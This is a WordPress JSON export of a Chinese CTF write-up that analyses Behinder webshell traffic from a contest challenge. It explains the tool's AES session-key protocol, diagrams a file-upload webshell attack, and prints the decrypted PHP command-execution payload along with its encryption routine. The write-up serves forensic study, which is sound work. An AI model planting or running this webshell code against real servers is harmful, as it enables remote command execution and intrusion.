{"id":1136,"date":"2026-04-18T18:50:32","date_gmt":"2026-04-18T10:50:32","guid":{"rendered":"http:\/\/shr1mp.top\/?p=1136"},"modified":"2026-04-18T19:47:39","modified_gmt":"2026-04-18T11:47:39","slug":"%e6%95%b0%e5%ad%97%e4%b8%ad%e5%9b%bd%e5%88%9b%e6%96%b0%e5%a4%a7%e8%b5%9b%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%ad%90%e8%b5%9b%e9%81%93%ef%bc%88%e6%a1%83%e6%9d%8e%e7%bb%84%ef%bc%89-%e5%86%b0","status":"publish","type":"post","link":"http:\/\/shr1mp.top\/index.php\/2026\/04\/18\/%e6%95%b0%e5%ad%97%e4%b8%ad%e5%9b%bd%e5%88%9b%e6%96%b0%e5%a4%a7%e8%b5%9b%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%ad%90%e8%b5%9b%e9%81%93%ef%bc%88%e6%a1%83%e6%9d%8e%e7%bb%84%ef%bc%89-%e5%86%b0\/","title":{"rendered":"\u6570\u5b57\u4e2d\u56fd\u521b\u65b0\u5927\u8d5b\u7f51\u7edc\u5b89\u5168\u5b50\u8d5b\u9053\uff08\u6843\u674e\u7ec4\uff09&#8212;-\u51b0\u78a7\u874e"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\" id=\"\u51b0\u874e\u7b80\u8ff0\">\u51b0\u874e\u7b80\u8ff0\uff1a<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/origin.picgo.net\/2026\/04\/12\/-2026-04-12-154248da0f4c7d5f26e10e.png\" alt=\"\"\/><\/figure>\n\n\n\n<p id=\"\u2460\u9996\u6b21\u8fde\u63a5webshell\u65f6-\u5ba2\u6237\u7aef\u9996\u5148\u5411\u670d\u52a1\u5668\u7aef\u53d1\u8d77\u4e00\u4e2aget\u8bf7\u6c42\">\u9996\u6b21\u8fde\u63a5webshell\u65f6\uff0c\u5ba2\u6237\u7aef\u9996\u5148\u5411\u670d\u52a1\u5668\u7aef\u53d1\u8d77\u4e00\u4e2aGET\u8bf7\u6c42<\/p>\n\n\n\n<p id=\"\u2461\u670d\u52a1\u5668\u7aef\u968f\u673a\u4ea7\u751f\u4e00\u4e2a16\u4f4d\u7684\u5bc6\u94a5-\u628a\u5bc6\u94a5\u56de\u663e\u7ed9\u5ba2\u6237\u7aef-\u540c\u65f6\u628a\u5bc6\u94a5\u5199\u8fdb\u670d\u52a1\u5668\u4fa7\u7684session\u4e2d\">\u670d\u52a1\u5668\u7aef\u968f\u673a\u4ea7\u751f\u4e00\u4e2a16\u4f4d\u7684\u5bc6\u94a5\uff0c\u628a\u5bc6\u94a5\u56de\u663e\u7ed9\u5ba2\u6237\u7aef\uff0c\u540c\u65f6\u628a\u5bc6\u94a5\u5199\u8fdb\u670d\u52a1\u5668\u4fa7\u7684Session\u4e2d<\/p>\n\n\n\n<p 
id=\"\u2462\u5ba2\u6237\u7aef\u83b7\u53d6\u5bc6\u94a5\u540e-\u5bf9\u4e8c\u8fdb\u5236payload\u5148\u8fdb\u884caes\u52a0\u5bc6-\u672c\u5730openssl\u6a21\u5757-\u518d\u901a\u8fc7post\u65b9\u5f0f\u53d1\u9001\u81f3\u670d\u52a1\u5668\u7aef\">\u5ba2\u6237\u7aef\u83b7\u53d6\u5bc6\u94a5\u540e\uff0c\u5bf9\u4e8c\u8fdb\u5236payload\u5148\u8fdb\u884cAES\u52a0\u5bc6\uff08\u672c\u5730openssl\u6a21\u5757\uff09\uff0c\u518d\u901a\u8fc7POST\u65b9\u5f0f\u53d1\u9001\u81f3\u670d\u52a1\u5668\u7aef<\/p>\n\n\n\n<p id=\"\u2463\u670d\u52a1\u5668\u6536\u5230\u6570\u636e\u540e-\u4ecesession\u4e2d\u53d6\u51fa\u5bc6\u94a5-\u8fdb\u884caes\u89e3\u5bc6-\u89e3\u5bc6\u4e4b\u540e\u5f97\u5230\u4e8c\u8fdb\u5236payload\u6570\u636e\">\u670d\u52a1\u5668\u6536\u5230\u6570\u636e\u540e\uff0c\u4eceSession\u4e2d\u53d6\u51fa\u5bc6\u94a5\uff0c\u8fdb\u884cAES\u89e3\u5bc6\uff0c\u89e3\u5bc6\u4e4b\u540e\u5f97\u5230\u4e8c\u8fdb\u5236payload\u6570\u636e<\/p>\n\n\n\n<p id=\"\u2464\u670d\u52a1\u5668\u89e3\u6790\u4e8c\u8fdb\u5236payload\u6587\u4ef6-\u6267\u884c\u4efb\u610f\u4ee3\u7801-\u5e76\u5c06\u6267\u884c\u7ed3\u679c\u52a0\u5bc6\u8fd4\u56de\">\u670d\u52a1\u5668\u89e3\u6790\u4e8c\u8fdb\u5236payload\u6587\u4ef6\uff0c\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u5e76\u5c06\u6267\u884c\u7ed3\u679c\u52a0\u5bc6\u8fd4\u56de<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u505a\u9898\">\u505a\u9898<\/h2>\n\n\n\n<p>\u5229\u7528\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u8fdb\u884c\u51b0\u874ewebshell\u690d\u5165<\/p>\n\n\n\n<p>\u6d415\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/origin.picgo.net\/2026\/04\/18\/-2026-04-18-1913195d497f658c0e3b36.png\" alt=\"\"\/><\/figure>\n\n\n\n<pre 
class=\"wp-block-code\"><code>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502                     \u653b\u51fb\u6d41\u7a0b                                 \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 1\ufe0f  \u4e0a\u4f20\u6076\u610f\u6587\u4ef6                                              \u2502\n\u2502     POST \/index.php (\u5305\u542b dcic.php)                         \u2502\n\u2502                                                             \u2502\n\u2502 2\ufe0f  \u670d\u52a1\u5668\u4fdd\u5b58\u6587\u4ef6                                            \u2502\n\u2502     \u4fdd\u5b58\u5230\uff1a\/uploads\/dcic.php \u6216 \/images\/dcic.php            \u2502\n\u2502                                                             \u2502\n\u2502 3\ufe0f  \u8bbf\u95ee WebShell                                            \u2502\n\u2502     GET http:\/\/10.30.16.146\/uploads\/dcic.php                \u2502\n\u2502                                                             \u2502\n\u2502 4\ufe0f  \u53d1\u9001\u52a0\u5bc6\u547d\u4ee4                                              \u2502\n\u2502     POST \/uploads\/dcic.php                                  \u2502\n\u2502     Body: AES128_Encrypt(\"system|<!--?php system('whoami'); ?-->\")\u2502\n\u2502                                                     
        \u2502\n\u2502 5\ufe0f  \u670d\u52a1\u5668\u6267\u884c\u547d\u4ee4                                            \u2502\n\u2502     \u89e3\u5bc6 \u2192 eval() \u6267\u884c \u2192 \u8fd4\u56de\u7ed3\u679c                            \u2502\n\u2502                                                             \u2502\n\u2502 6\ufe0f  \u83b7\u53d6 Flag                                                 \u2502\n\u2502     \u53d1\u9001\uff1aAES128_Encrypt(\"system|<!--?php system('cat \/flag*'); ?-->\")\u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<\/code><\/pre>\n\n\n\n<p>\u8fd9\u9053\u9898\u7684\u51b0\u874e\uff08v2\uff09\u7279\u5f81\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AES-128\u52a0\u5bc6\u4e14\u5bc6\u94a5\u56fa\u5b9a16\u5b57\u8282<\/li>\n\n\n\n<li>XOR\u56de\u9000<\/li>\n\n\n\n<li>Session\u5bc6\u94a5<\/li>\n\n\n\n<li>\u6709\u547d\u4ee4\u5206\u9694\u7b26\u201c|\u201d<\/li>\n<\/ul>\n\n\n\n<p>\u6b64\u5904\u76f4\u63a5\u7528PZ\u8fdb\u884c\u89e3\u5bc6<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/origin.picgo.net\/2026\/04\/18\/-2026-04-18-1833192ba932daeed15efc.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u6d4114\uff1a\uff08\u5185\u5c42base64\u89e3\u7801\u540e\uff1b\uff09<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>@error_reporting(0);\n\nfunction getSafeStr($str){\n    $s1 = iconv('utf-8','gbk\/\/IGNORE',$str);\n    $s0 = iconv('gbk','utf-8\/\/IGNORE',$s1);\n    if($s0 == $str){\n        return $s0;\n    }else{\n        return iconv('gbk','utf-8\/\/IGNORE',$str);\n    }\n}\nfunction main($cmd,$path)\n{\n    @set_time_limit(0);\n    @ignore_user_abort(1);\n    
@ini_set('max_execution_time', 0);\n    $result = array();\n    $PadtJn = @ini_get('disable_functions');\n    if (! empty($PadtJn)) {\n        $PadtJn = preg_replace('\/&#91;, ]+\/', ',', $PadtJn);\n        $PadtJn = explode(',', $PadtJn);\n        $PadtJn = array_map('trim', $PadtJn);\n    } else {\n        $PadtJn = array();\n    }\n    $c = $cmd;\n    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {\n        $c = $c . \" 2&gt;&amp;1\\n\";\n    }\n    $JueQDBH = 'is_callable';\n    $Bvce = 'in_array';\n    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {\n        ob_start();\n        system($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {\n        $handle = proc_open($c, array(\n            array(\n                'pipe',\n                'r'\n            ),\n            array(\n                'pipe',\n                'w'\n            ),\n            array(\n                'pipe',\n                'w'\n            )\n        ), $pipes);\n        $kWJW = NULL;\n        while (! feof($pipes&#91;1])) {\n            $kWJW .= fread($pipes&#91;1], 1024);\n        }\n        @proc_close($handle);\n    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {\n        ob_start();\n        passthru($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {\n        $kWJW = shell_exec($c);\n    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {\n        $kWJW = array();\n        exec($c, $kWJW);\n        $kWJW = join(chr(10), $kWJW) . chr(10);\n    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {\n        $fp = popen($c, 'r');\n        $kWJW = NULL;\n        if (is_resource($fp)) {\n            while (! 
feof($fp)) {\n                $kWJW .= fread($fp, 1024);\n            }\n        }\n        @pclose($fp);\n    } else {\n        $kWJW = 0;\n        $result&#91;\"status\"] = base64_encode(\"fail\");\n        $result&#91;\"msg\"] = base64_encode(\"none of proc_open\/passthru\/shell_exec\/exec\/exec is available\");\n        $key = $_SESSION&#91;'k'];\n        echo encrypt(json_encode($result));\n        return;\n        \n    }\n    $result&#91;\"status\"] = base64_encode(\"success\");\n    $result&#91;\"msg\"] = base64_encode(getSafeStr($kWJW));\n    echo encrypt(json_encode($result));\n}\n\n\n\uff08\u4e0d\u77e5\u9053\u4e3a\u5565\uff0c\u8fd9\u4e2a\u4ee3\u7801\u5728\u6b64\u5904\u8001\u662f\u8981\u65ad\u5f00\uff09<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>function Encrypt($data)\n{\n @session_start();\n    $key = $_SESSION&#91;'k'];\n\tif(!extension_loaded('openssl'))\n    \t{\n    \t\tfor($i=0;$i&lt;strlen($data);$i++) {\n    \t\t\t $data&#91;$i] = $data&#91;$i]^$key&#91;$i+1&amp;15]; \n    \t\t\t}\n\t\t\treturn $data;\n    \t}\n    else\n    \t{\n    \t\treturn openssl_encrypt($data, \"AES128\", $key);\n    \t}\n}\n$cmd=\"Y2QgL3Zhci93d3cvaHRtbC91cGxvYWQvIDtlY2hvIDJpOVE4QXRGRXV6WUh4d2NVbXBqRkNRY2hVZDFRcXdRTWY4bVdmdlV3bTlMRThVYUtWWURUYXE1dEcgPiBmZmZmZmYxMTFhRyAmJiBscw==\";$cmd=base64_decode($cmd);$path=\"L3Zhci93d3cvaHRtbC91cGxvYWQv\";$path=base64_decode($path);\nmain($cmd,$path);<\/code><\/pre>\n\n\n\n<p>\u5bf9 $cmd \u8fdb\u884c base64 \u89e3\u7801\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cd \/var\/www\/html\/upload\/ ;echo 2i9Q8AtFEuzYHxwcUmpjFCQchUd1QqwQMf8mWfvUwm9LE8UaKVYDTaq5tG &gt; ffffff111aG &amp;&amp; ls<\/code><\/pre>\n\n\n\n<p>\u5bf9 echo \u5199\u5165\u7684\u5b57\u7b26\u4e32\u8fdb\u884c base58 \u89e3\u7801\uff0c\u5f97\u5230 flag\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>flag{dbeeed36-0d7e-211a-69db-66bd74ea91d5}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u51b0\u874e\u7b80\u8ff0\uff1a 
\u9996\u6b21\u8fde\u63a5webshell\u65f6\uff0c\u5ba2\u6237\u7aef\u9996\u5148\u5411\u670d\u52a1\u5668\u7aef\u53d1\u8d77\u4e00\u4e2aGET\u8bf7\u6c42 \u670d\u52a1\u5668\u7aef\u968f\u673a\u4ea7\u751f\u4e00\u4e2a16\u4f4d\u7684\u5bc6\u94a5\uff0c\u628a\u5bc6\u94a5\u56de\u663e\u7ed9\u5ba2\u6237 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_gspb_post_css":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[9],"tags":[],"class_list":["post-1136","post","type-post","status-publish","format-standard","hentry","category-misc"],"_links":{"self":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1136","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/comments?post=1136"}],"version-history":[{"count":10,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1136\/revisions"}],"predecessor-version":[{"id":1213,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1136\/revisions\/1213"}],"wp:attachment":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/media?parent=1136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/categories?post=1136"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/tags?post=1136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}